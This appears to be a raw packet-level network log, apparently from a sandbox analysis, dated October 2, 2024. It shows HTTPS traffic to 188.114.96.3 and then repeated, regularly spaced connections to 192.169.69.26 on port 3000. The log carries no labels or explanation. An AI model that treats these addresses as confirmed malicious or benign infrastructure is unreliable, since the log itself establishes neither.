                              Oct 2, 2024 05:29:49.459981918 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.459988117 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.460098982 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.460134029 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.460144043 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.460149050 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.460187912 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.461718082 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.483042002 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.483073950 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.483112097 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.483118057 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.483165026 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.483412027 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.483912945 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.483921051 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.483963966 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.483968973 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.484647036 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.484690905 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.484695911 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.484723091 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.484731913 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.484738111 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.484771013 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.484795094 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.484814882 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.484818935 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.485586882 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.485630989 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.485635042 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.485677958 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.486368895 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.486428022 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.486470938 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.486520052 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.530368090 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.530457973 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.545895100 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.545947075 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.545998096 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.546011925 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.546027899 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.546071053 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.546111107 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.546122074 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.546128035 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.546170950 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.546823025 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.546878099 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.546884060 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.546931028 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.569231033 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.569305897 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.569312096 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.569320917 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.569364071 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.569782972 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.569839954 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.570452929 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.570487022 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.570501089 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.570504904 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.570530891 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.571520090 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.571553946 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.571568966 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.571573973 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.571595907 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.571619987 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.571662903 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.571667910 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.571713924 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.573580980 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.573623896 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.573636055 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.573641062 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.573667049 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.573687077 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.573700905 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.573738098 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.573749065 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.573753119 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.573776960 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.573796034 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.573807955 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.573843956 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.573854923 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.573858023 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.573882103 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.573908091 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.610799074 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.610903025 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.610996962 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.610996962 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.611008883 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.611047983 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.616424084 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.616486073 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.631880999 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.632049084 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.632208109 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.632261992 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.632752895 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.632803917 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.633177996 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.633213043 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.633228064 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.633233070 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.633251905 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.633268118 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.633981943 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.634017944 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.634037018 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.634043932 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.634068966 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.634085894 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.634818077 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.634881020 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.635677099 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.635715961 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.635735035 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.635741949 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.635751963 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.656635046 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.656653881 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.656711102 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.656719923 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.658355951 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.658379078 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.658411026 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.658417940 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.658443928 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.660098076 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.660125971 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.660157919 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.660165071 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.660182953 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.661870956 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.661892891 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.661930084 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.661936998 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.661957026 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.702841997 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.702864885 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.703026056 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.703026056 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.703039885 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.719007015 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.719032049 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.719098091 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.719110012 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.719814062 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.719830990 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.719871998 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.719882011 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.719903946 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.742013931 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.742037058 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.742106915 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.742120028 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.743078947 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.743094921 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.743253946 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.743253946 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.743261099 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.744700909 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.744718075 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.744755030 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.744760036 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.744771957 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.745501995 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.745516062 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.745557070 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.745563030 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.746471882 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.746522903 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.746531010 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.748334885 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.748353958 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.748389959 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.748398066 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.748418093 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.794691086 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.794704914 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.804701090 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.804733992 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.804769993 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.804923058 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.804924011 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.804924011 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.804940939 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.805069923 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.805124044 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.805131912 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.806052923 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.806071997 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.806107044 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.806112051 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.806143999 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.828269005 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.828286886 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.828481913 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.828489065 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.831254005 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.831273079 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.831341028 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.831346989 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.831370115 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.831415892 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.831442118 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.831446886 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.831473112 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.831624985 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.831640005 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.831681967 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.831686974 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.831715107 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.833406925 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.833424091 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.833468914 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.833475113 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.833498001 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.833878040 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.833939075 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.833945990 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.888454914 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.890902996 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.890909910 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.890991926 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.891036034 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.891042948 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.891082048 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.891105890 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.892000914 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.892026901 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.892083883 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.892088890 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.892131090 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.893170118 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.893188000 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.893220901 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.893224955 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.893258095 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.893275023 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.893279076 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.915183067 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.915204048 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.915401936 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.915401936 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.915409088 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.916240931 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.916259050 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.916296005 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.916301012 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.916321993 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.917149067 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.917166948 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.917197943 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.917202950 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.917231083 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.917876959 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.917924881 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.917929888 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.917983055 CEST44349706188.114.96.3192.168.2.11
                              Oct 2, 2024 05:29:49.918020964 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:49.918231964 CEST49706443192.168.2.11188.114.96.3
                              Oct 2, 2024 05:29:50.405608892 CEST497073000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:29:50.410742044 CEST300049707192.169.69.26192.168.2.11
                              Oct 2, 2024 05:29:50.410815001 CEST497073000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:29:50.412161112 CEST497073000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:29:50.417051077 CEST300049707192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:00.239814043 CEST300049707192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:00.240072966 CEST497073000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:00.240072966 CEST497073000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:00.244921923 CEST300049707192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:01.249028921 CEST497143000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:01.254316092 CEST300049714192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:01.254661083 CEST497143000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:01.255134106 CEST497143000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:01.259946108 CEST300049714192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:10.993820906 CEST300049714192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:10.994025946 CEST497143000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:10.994071960 CEST497143000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:10.999653101 CEST300049714192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:11.999350071 CEST497153000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:12.004257917 CEST300049715192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:12.004359961 CEST497153000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:12.004709005 CEST497153000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:12.009608030 CEST300049715192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:21.751375914 CEST300049715192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:21.751456022 CEST497153000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:21.751488924 CEST497153000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:21.757030964 CEST300049715192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:22.764642000 CEST497163000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:22.769695997 CEST300049716192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:22.769844055 CEST497163000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:22.770163059 CEST497163000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:22.774929047 CEST300049716192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:32.899014950 CEST300049716192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:32.899035931 CEST300049716192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:32.899120092 CEST497163000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:32.908989906 CEST497163000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:32.913841009 CEST300049716192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:33.920877934 CEST497173000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:33.925895929 CEST300049717192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:33.925997019 CEST497173000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:33.926373959 CEST497173000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:33.931159973 CEST300049717192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:43.679620028 CEST300049717192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:43.679877043 CEST497173000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:43.679877043 CEST497173000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:43.684725046 CEST300049717192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:44.687700033 CEST497193000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:44.693031073 CEST300049719192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:44.693212032 CEST497193000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:44.693708897 CEST497193000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:44.698487043 CEST300049719192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:54.459727049 CEST300049719192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:54.459870100 CEST497193000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:54.459955931 CEST497193000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:54.464817047 CEST300049719192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:55.880702019 CEST497203000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:55.885549068 CEST300049720192.169.69.26192.168.2.11
                              Oct 2, 2024 05:30:55.885684013 CEST497203000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:55.885920048 CEST497203000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:30:55.890825987 CEST300049720192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:05.708508968 CEST300049720192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:05.708581924 CEST497203000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:05.708688974 CEST497203000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:05.713630915 CEST300049720192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:06.717865944 CEST497213000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:06.762141943 CEST300049721192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:06.762939930 CEST497213000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:06.763293028 CEST497213000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:06.768033028 CEST300049721192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:16.550450087 CEST300049721192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:16.550926924 CEST497213000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:16.551019907 CEST497213000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:16.555738926 CEST300049721192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:17.561785936 CEST497223000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:17.567003965 CEST300049722192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:17.567086935 CEST497223000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:17.567430973 CEST497223000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:17.572338104 CEST300049722192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:27.385427952 CEST300049722192.169.69.26192.168.2.11
                              Oct 2, 2024 05:31:27.385605097 CEST497223000192.168.2.11192.169.69.26
                              Oct 2, 2024 05:31:27.385700941 CEST497223000192.168.2.11192.169.69.26
